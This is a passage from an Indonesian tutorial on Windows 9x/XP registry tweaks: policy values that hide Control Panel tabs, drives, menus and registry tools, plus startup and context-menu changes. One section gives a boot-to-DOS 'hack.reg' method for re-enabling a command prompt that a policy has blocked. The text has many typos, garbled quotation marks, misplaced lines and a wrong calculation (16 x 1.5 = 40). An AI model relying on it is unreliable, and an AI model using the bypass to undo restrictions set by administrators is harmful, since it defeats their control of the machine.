Explorer.exe dari disket backup.

Cara termudah adalah dengan mencopykan kembali file yang kita backup sebelum
melakukan modifikasi.

MANIPULASI CONTROL PANEL

Menghilangkan akses display setting

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
setting display secara total.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tap Appearance

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
tab Apparance pada dispaly propertis.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispAppearancePage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Display Tab Background

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
tab Apparance pada dispaly propertis.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispBackgroundPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab Screen Saver

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
tab Screen Saver pada dispaly propertis.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispScrSavPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab Setting pada Display

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
tab Setting pada dispaly propertis.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispSettingsPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Network Control panel

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
Network pada ontrol panel.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Network
Value Name:NoNetSetup
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab Network Identification

Jika Anda meng-enable setting
ini maka pemakai tidak akan dapat mengakses Network Identification.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Network
Value Name:NoNetSetupIDPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan File and Printer Sharing

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
File and printer Sharing sehingga pemakai tidak melakukan penonaktifan atau
pembuatan file baru melalui Sharing Printer.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Network
Value Name: NoFileSharingControl
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Network Access Control

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
Network Acces Control yang dipakai untuk menentukan apakah komputer mendukung
User_level acces atau Share _level acces.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Network
Value Name: NoNetSetupSecurityPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Akses ke Paswords Control Panel

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengakses
Paswords sehingga pemakai tidak dapat mengubah paswords.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoSecCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab Remote Administrations

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
remote administration Settings.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoAdminPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab User Profiles

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengendalikan
apakah pemakai memakai Share atau memakai profil user terpisah.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoProfilePage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tab Change paswords

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
paswords.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoPwdPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Penambahan Printers

Jika Anda meng-enable setting
ini maka pemakai tidak akan dapat menambah setting printers.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoAddPrinter
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Penghapusan Printers

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat menghapus
seeting printers.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoDeletePrinter
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Tab General and Details Printers

Jika Anda meng-enable setting
ini maka pemakai tidak akan dapat mengubah setting printers.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoPrinterTab
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan

Mematikan Tab Hardware Profiles

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
hardware profile dari icon system di Control Panel.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoConfigPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Tab Device manager

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
Device manager pada control panel / system.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDevMgrPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mematikan Tombol File System

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
File System dari tab Performance.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoFileSysPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghilangkan Tombol Virtual Memory

Jika Anda meng-enable setting ini maka pemakai tidak akan dapat mengubah
Tombol Virtual memory .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name:NoVirtMemPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

MANIPULASI DESKTOP

MEMASANG CONTROL PANEL PADA DESTOP

Tujuan :Memasang folder khusus Control panel ke destop
Key : HKEY_CLASSES_ROOT\CLSID
Langkah pertama adalah mencary system ID ( pengenal folder tersebut ) cara
tekan F3 dan ketik control panel, maka ia akan berhenti pada
[HKEY_CLASSES_ROOT\CLSID]{21EC2020-3AEA-1069-A2DD-08002B30309D} Cara membuatnya
klik kanan pilih new folder ganti kata new folder dengan angka tersebut
diatas.

MENAMPILKAN ICON DENGAN HIGH COLOR

Tujuan : Memperbaiki penampilan icon
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Control Panel\destop\WindowMetrics
Data Type : String
Value Name : Shell Icon BPP
Data ( 16 / 24 /32 tergantung vidio card kita )

MENGUBAH ICON UKURAN DESKTOP

Tujuan : Mengubah ukuran destop
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Control Panel\destop\WindowMetrics
Data Type : String
Value Name : Shell Icon Size
Data ( 32 / 64 tergantung keinginan kita )

MENGUBAH POSISI WALPAPER PADA DESKTOP

Tujuan : Mengganti posisi walpaper
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Control Panel\
Data Type : String
Value Name : Wallpaperoriginx ( horizontal ), Wallpaperoriginy ( vertical )
Data ( tergantung keinginan kita )

Hilangkan Drive Pada Komputer

Hal ini dapat dilakukan dengan maksud orang lain tidak bisa akses data komputer anda
Ikutilah langkah berikut.
Klik Start----->Run, ketikkan regedit lalu tekan Enter.
Anda bisa menyembunyikan drive pada My Computer dengan cara masuk ke :
Key : HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer
Value Name : NoDrives
Data Type : REG_DWORD
Data :
Pada data bisa Anda isi dengan drive yang ingin Anda sembunyikan. Adapun
nilainya adalah :
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024,
L: 2048, M: 4096,
N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U:1048576,
V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

Hilangkan Icon Network Neigborhood

Icon Network Neigborhood akan nampak pada desktop jika Anda menginstall Windows
Networking. Jika Anda tidak suka, Anda bisa menyembunyikan icon tersebut.
Ikutilah langkah berikut.
Klik Start------>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Policies\Explorer
Value Name: NoNetHood
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/menyembunyikan icon)

MEMBUAT SCORLING LEBIH HALUS

Tujuan : Membuat scorling tampilan lebih halus
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\CurrentVersion\
policies\Explorer
Data Type : Binary
Value Name : SmoothScroll
Data : 01 00 0000

MENGHILANGKAN ANIMASI KLIK HERE TO BEGIN

Tujuan : Menghilangkan pesan klik here to begin
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\CurrentVersion\
policies\Explorer
Data Type : Binary
Value Name : NoStartBanner

MENGHILANGKAN PANAH SHORTCUT PADA ICON

Tujuan : Menghilangkan tanda panah shortcut pada icon
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLASSES_ROOT\Piffile
Key: HKEY_CLASSES_ROOT\Inkfile
Cara mengubah / menghapus nama value IsShortCut pada kedua subkey diatas

MENYEMBUNYIKAN SELURUH ICON PADA DESTOP

Tujuan : Menyembunyikan seluruh icon pada destop
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\CurrentVersion\
policies\Explorer
Data Type : Dword
Value Name : NoDesktop
Data : 0 (Disabled ) 1 ( Enabled)

MANIPULASI MENU

Merubah tampilan perataan pada menu pulldown

Tujuan : Mengubah gaya perataan tampilan menu
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Controlpanel\desktop
Data Type : String
Value Name : MenuDropAlignment
Data : 0 ( Rata kiri ) 1 ( Rata kanan)

Menyembunyikan menu Run

Setting berikut akan menyembunyikan fasilitas RUN yang terdapat pada Start
Menu. Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoRun
Data Type : REG_DWORD
Data: (0=disable, 1=enable)

Menyembunyikan Fasilitas Shutdown

Setting berikut akan menyembunyikan fasilitas Shutdown yang terdapat pada Start
Menu. Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoClose
Data Type : REG_DWORD >
Data: (0=disable, 1=enable)
Untuk melakukan shutdown ikutilah langkah berikut :
Dimenu Run Ketikkan c:\Windows \rundll32.exe user.exe,exitwindows

Menyembunyikan menu Find

Jika Anda meng-enable setting
berikut, maka Find yang terdapat pada Start Menu akan hilang.
Ikutilah langkah berikut.

Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer
Value Name: NoFind
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Menghilangkan Taskbar pada menu Setting

Jika Anda meng-enable setting di bawah ini
maka tidak akan muncul menu Taskbar pada Start Menu, Tab Setting .
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]
Value Name: NosetTaskbar
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Menyembunyikan Menu Folder Setting

Jika Anda meng-enable setting ini maka menu Control Panel
dan Printer yang terdapat pada Setting pada Start Menu akan hilang.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoSetFolder
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menghapus item dari new menu

Tujuan : Menghilangkan item atau pilihan pembutan file dengan menu kontexs
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLASSES_ROOT\..ext\ShellNew
Rename ShellNew menjadi misalkan XshellNew

Menu lebih cepat

Tujuan : Membuat menu ditampilkan dengan lebih cepat
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Controlpanel\desktop
Data Type : String
Value Name : MenuShowDelay
Data : 0 â€“ 9 (Nilai 0 ( nol ) adalah yang tercepat )

Disable DOS

Setting berikut ini akan mencegah penggunaan MS-DOS command prompt pada Windows.
Ikutilah langkah berikut.
Klik Start------->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Policies\WinOldApp
Value Name: Disabled
Data Type: REG_DWORD Data: (0 = disable, 1 = enable/mencegah MS-Dos command
prompt)
Untuk masuk ke msdos ikutilah langkah berikut :
Saat booting tekan tonbol F8 dan pilih dos promt only
kemudian ketik :
Copy con hack.reg (tekan enter )
Akan tampil Texs editor dan ketikan :
Regedit4
[hkey_current_user\software\Microsoft\windows\currentversion\policies\WinOldApp]
â€œDisabled=dword:00000000â€�
Setiap pengetikan setiap kali akan berganti baris harus tekan
enter . Setelah selah penulisan tekan F6 Atu CTRL-Z
dan tekan enter sekali lagi untuk mengedit tekan CTRL-C .
Saat nya untuk export registri dari msdost :
cd windows
c:regedit /e
C:\hack.reg
keyâ€�hkey_current_user\software\Microsoft\windows\currentversion\policies\WinOldAppâ€�

MANIPULASI FILE

Memakai noteped untuk membuka file

Tujuan : Membuka sembarang file dengan notepad
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLASSES_ROOT\*\
Data Type : Key
Value Name : Shell
Dibawah Subkey Shell kita buat key baru : new-->
open pada jendela kanan open ada value bernama devault jenis data yang dipakai
adalah string dan kilk ganda value ini dan isi dengan : lihat dengan¬epad.
Selanjutnya pada subkey Open buat subkey baru new--> key dan ketik COMMAND klik
ganda pada subkey ini pada jendela kanan terlihat value devault klik ganda value
ini dan isi dengan Notepad%1
Data : 0 ( Rata kiri ) 1 ( Rata kanan)

Mengatur ukuran alokasi file yang menerus

Tujuan : Mengoptimalkan pemakaian disk dalam menyimpan data file
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Filesystem
Data Type :Reg_DWord
Value Name : ContigFileAllocSize
Data : 200

Menambah exporer pada setiap folder

Tujuan : Menambah pilihan penjelajahan ( expolorer) pada menu kontex
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLSSES_ROOT\directory\shell\Explore
Type : String
Pada subkey Explore di jendela kanan ada value default klik ganda value
tersebut dan isi dengan J&elajah
Buat Subkey baru di bawah
explore new --> key dan beri nama COMMAND dan isi value default kita ubah
menjadi Explorer.exe/e,root,/idlist,%1

Memasukkan akses ke DOS prompt pada menu kontexs

Tujuan : Memasangkan pilihan dos prompt pada menu kontex
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLSSES_ROOT\directory\shell\COMMANDPrompt
Data Type : String
Pada subkey Commandprompt di jendela kanan ada value default klik ganda
value tersebut dan isi dengan panggil &dos
Buat Subkey baru di bawah CommandPrompt new -->key
dan beri nama COMMAND dan isi value default kita ubah menjadi Command.com
/k cd â€œ%1â€�

Mengubah icon File Bitmap

Tujuan : Mengubah icon file bitmap sehingga menampilkan isi yang sesungguhnya
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLSSES_ROOT\directory\Paint.Picture\DefaultIcon
Value Name : (Default)
Data Type : String
Pada subkey DefaultIcon di jendela kanan ada value default klik ganda value
tersebut dan isi dengan %1.

Menjalankan program secara otomatis

Tujuan : Mengaktifkan program saat windows melakukan proses booting
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name : Programku
Data Type : String
Data : C:\Windows\Calc.exe ( tergantung keinginan pemakai )

Mengubah kebiasan buruk file *.reg

Secara default jika klik ganda file *.reg maka akan secara
otomatis file tersebut kan di import kesistem registry untuk mengubah kebiasan
itu lakukan lah langkah berikut :
Masuk ke Windows Explorer pilih View kemudia pilih Option
selanjutnya klik tab file Types cari kata â€œRegistration Entriesâ€� klik ganda
kata ini dan klik tombol edit akan muncul tiga tindakan (Action) yaitu Edit,
Merge, Print. Fungsi dari tiga action tersebut Edit : membuka dan mengedit file
, Merge : untuk melukan proses inport, Print : dipakai untuk melakukan
pencetakan data. Default pilihan ini adalah merge dan kita akan mengubah nya
menjadi pilihan Edit, Untuk mengubahnya klik tombol edit dan klik tombol
set default . Untuk melakukan inport data klik kanan dan pilih merge.

MANIPULASI LAIN-LAIN

Tidak Menyimpan setting saat keluar windows

Tujuan : Membuat windows tidak dapat menyimpan setting terakhir yang di ubah .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoSaveSettings
DAta Type : Dword
Data: (0 = disabled, 1 = enabled/sembunyikan)

Mengubah Informasi Nama dan Perusahaan

Tujuan : Mengubah informasi nama dan perusahaan .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
Data Type:String

Menambah Tip Pribadi

Tujuan : Menambah atau menghapus data data tip pada program tips of the day .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Explorer\Tips
Data Type: String

Menghapus Fasilitas Uninstall

Tujuan : Untuk menghapus fasilitas untuk proses Uninstall.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Uninstall
Data Type: String

Menampilkan Pesan saat Boting windows

Jika Anda meng-enable setting di bawah ini maka akan muncul pesan
dimonitor saat Botting windows .
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Winlogon
Clik Kanan --> New --> String Value
Value Name : LegalNoticeCaption "Tulis Komentar anda â€œ
Value name : LegalNoticeTextâ€œ Tulis Komentar anda "

Membatasi aplikasi yang dapat dijalankan

Tujuan : Membatasi pemakaian program yang dapat dijalankan.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer\ RestrictRun
Nama Value : RestrictRun
Langkah Pembuatan :
1. Buat Value baru dibawah Explorer --> Klic Kanan
Data Type : Reg_Dword
Value Name : RestrictRun
Data : Disabled =0 / Enable=1
2. Jika proses selesai buat Key Baru Dibawah Explorer
Data Type : Key
Value Name : RestricRun
Klik kanan RestrickRun tambahkan :
Data Value : String Value
Example
1 = Explorer.exe
2 = Word.exe

Mematikan Program pengedit Registry

Tujuan : Mematikan penggunaan program pengedit registry .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Data Type : Dword
Value Name : DisableRegistryTools

Memasangkan Pesan pada system propertis

Tujuan : Memasangkan pesan
tambahan pada jendela system propertis yang ada pada Control Panel .
Ikutilah langkah berikut.
1. Buatlah sebuah file dengan jenis INI.
File ini harus bernama OEMINFO.INIdan letak kan file tersebut dibawah direktory
\Windows\System\..Jika ingin menambahkan garbar Buatlah gambar
dengan format.bmp dan masukkan di bawah direktory windows/system
Contoh :
[General]
Manufakturer=â€œDATA AUTOMATIONâ€�
Modelâ€�Jl. Raya Poncowarno 143 kalirejoâ€�
[Support Information]
Line1=â€œ Punya hobi dan ingin mewujutkan hoby ? HUBUNGI â€œ
Line2=â€œ Mr.Vandepoor 08165789654â€�

Virtual Memory

Tujuan : Mendongkrak kinerja windows dengan mengatur Virtual memory .
Ikutilah langkah berikut.
1. Klik Strat-Setting-Control_panel.
Klik system sehingga kan terlihat jende system propertis ,
lalu klik tab performance , kliktombol virtual memory , klik radio button
Let me specify my own virtual memory. masukkan angka setengah kali dari
jumlah memory misal :
mem=16 mb, ukuran yang aman adalah 16x 1.5 =40 mb .

Menghapus daftar RunMRU

Tujuan : Menghapus daftar RUN .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USERS\Software\Microsoft\Windows\
CurrentVersion\Explorer\RunMRU
Jika fasilitas RunMRU ditemukan pada disebelah kanan akan ada tampilan
pilih daftar RUN yang kan dihapus

Membuat CLSID Pribadi
Tujuan : Membuat Hardwired icon untuk membuka folder pribadi .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CLASESS_ROOT\CLSID
Langkah :
1. Buat folder Baru misal
c:\windows\folderku
2. Pilih New
3. Kita buat CLSID pribadi misal
{12345678-abcd-abcd-abcd-12345678abc}
4. Klik Dua kali kombinasi angka tersebut dan isi dengan Folderku
5. Buat Defauld Icon cara klik kanan CLSID Pribadi New --> Key
6. Setelah terbentu otomatis di jendela kanan
akan muncul nama value yang berbunyi Defauld
7. klik ganda value tersebut sehingga jendela
edit Strings Tampil
8. Ketik icon yang akan ditampilkan -->
c:\windows\carved stone.bmp
9. Buat sub Key Baru Beri nama Shell--> Klik kanan CLSID Pribadi new --> Key
ketik SHELL
10. klik kanan Shell ketik Buka
11. Klik kanan sub Key buka New --> Key ketik Command
12. klik ganda value Command dan isikan C:\Windows\Explorer ,
C:\Windows\Folderku
13. Klik Kanan CLSID pribadi New--> Key ketik ShellFolder
14. Aktifkan dengan mengkliknya dan klik area
kosong sebelah kanan Pilih New Binary Value ketik Atributes dan
tekan enter
15. Klik ganda Value Atributes sehingga kotak
Edit Binary Value Tampil dan isilah 00 00 00 00
jika tidak mealukan pengaturan apapun
16. jika kita ingin melakukan inofasi
laksanakan prosedure seperti di bawah
Byite1 Fungsi
01 Copy
02 Move
10 Rename
20 DElete
40 Propertis
17. Misal jika ingin melaksankan fungsi Copy Isi dengan 01 00 00 00,
tetapi jika kita ingin melaksanakan beberapa fungsi sekaligus maka
tambahkan kedua nilai fungsi tsb misal kita ingin perintah MOVE dan
RENAME maka fungsi yang kita tulis adalah 22 00 00 00
18. Memasang Harwired icon ke DESTOP atau ke MY KOMPUTER untuk itu lakukan
langkah berikut
19. Pergilah
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\Destop\NameSpace
20. Klik kanan pada NameSpace New-->Key ketik
{12345678-abcd-abcd-abcd-12345678abcd} harus samadengan yang dibuat
sebelumnya.
21.Silahkan coba dan kerkakan sesuai prosedure

Menambahkan Pilihan Help

Tujuan : Menambahkan pilihan Help pada menu kontek
Ikutilah langkah berikut :
Key : HkEY_CLASEES_ROOT\Direktory\Shell
Klik kanan pada subkey shell --> New --> key ketik
Totolong !!! kemudian klik kanan subkey tolong
Key ketik COMMAND , aktifkan subkey
COMMAND dan perhatikan pada jendela (panel)sebelah kanan pada kolom value
name akan kan terdapat satu namavalue yang bernama default, klik kanan
value tersebut sehingga kotak EDIT STRINGS tampil ketikkan perintah berikut
pada isianya C:\windows\winhelp32.exe | c:\windows\help\windows.hlp
tekan enter untuk memfungsikan nya

Mencetak isi directory ke Printer

Tujuan : Mencetak daftar nama nama file yang ada pada suatu direktory
KEY : HKEY_CLASSES_ROOT\Directory\Shell
Langkah :
1. Buat Batch File cara masuk Prompt Dos dan ketik
c:\cd windows enter
c:\copy con Cetak.bat enter
kemudian ketikkan
cd%1 ( tekan enter )
dir>prn ( tekan enter )tekan F6 atau Ctrl-Z untuk kembali ke
prompt Dos
2. Kemudian lihat file
cetak.bat dengan windows explorer dan klik kanan cetak.bat pilih propertis masuk
ke tab Program ganti isian Run MINIMIZED dan centang CLOSE ON EXIT dan klik oke
3. kemudian
HKEY_CLASSES_ROOT\Direktory\Shell klik
kanan subkey Shell New --> Key ketik Cetak dan tekan enter
4. Kemudian klik kanan pada subkey Cetak New--> Key ketik COMMAND dan enter
klik ganda nama value default sehingga jendela edit string tampil dan isi
dengan Cetak.pif klik oke

Menghapus data dengan File Reg

Tujuan : Menghapus data diregistry dengan file Reg
Langkah : Key : HKEY_CLASSES_ROOT dan
carilah Subkey .TXT dan klik sehingga ia aktif terpilih kemudian exsporlah data
registry dari subkey .TXT ke file TEXTS caranya klik menu Registry dan pilih
EXPORT REGISTRY FILE tapi sebelumnya aktifkan subkey .TXT . Pada
bagian export range pada pilihan Selected branch akan berisi keterangan bahwa
subkey.txt yang kan di export. Klik isian file name dan isi nama file yang kan
menyimpan data tersebut misal TEXT1 dan
klik save txt1.reg file ini berada di subdirectory windows. Lakukan export data
sekasekali lagi dan beri nama text2.reg jika sudah selasai keluar dari regedit
dan aktif kan windows explorer dan cari
file text2.reg klik kanan file tersebut dan pilih edit dan hapus semua data kecuali
[ HKEY_CLASSES_ROOT\.TXT ]. Sesudah itu berilah tanda minus dibelakang kata
HKEY [-HKEY_CLASSES_ROOT\.TXT] klik file dan pilih save manipulasi telah
selesai dilakukan untuk melakukan nya klik text2.reg dan untuk menormalkan
kembali klik text1.reg

MANIPULASI REGISTRY WIN XP

Menonaktifkan Tour Win XP

Tujuan : Menonaktifkan tour win XP .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedt32 lalu tekan Enter.
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Applets\Tour
Value Name: RunCount
DAta Type : Dword
Data: (0 = disabled, 1 = enabled/sembunyikan)
Jika suatu saat anda ingin menjalan kan tour Win XP, anda dapat menklik
Start -->All Program --> Accesorise --> Tour Windows Xp

Menyembunyikan tombol all program dari start menu

Tujuan : Menyembunyikan tombol all program dari start menu .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedt32 lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
policies\. ----> Jika ingin Menyembunyikan Dilogin saja.
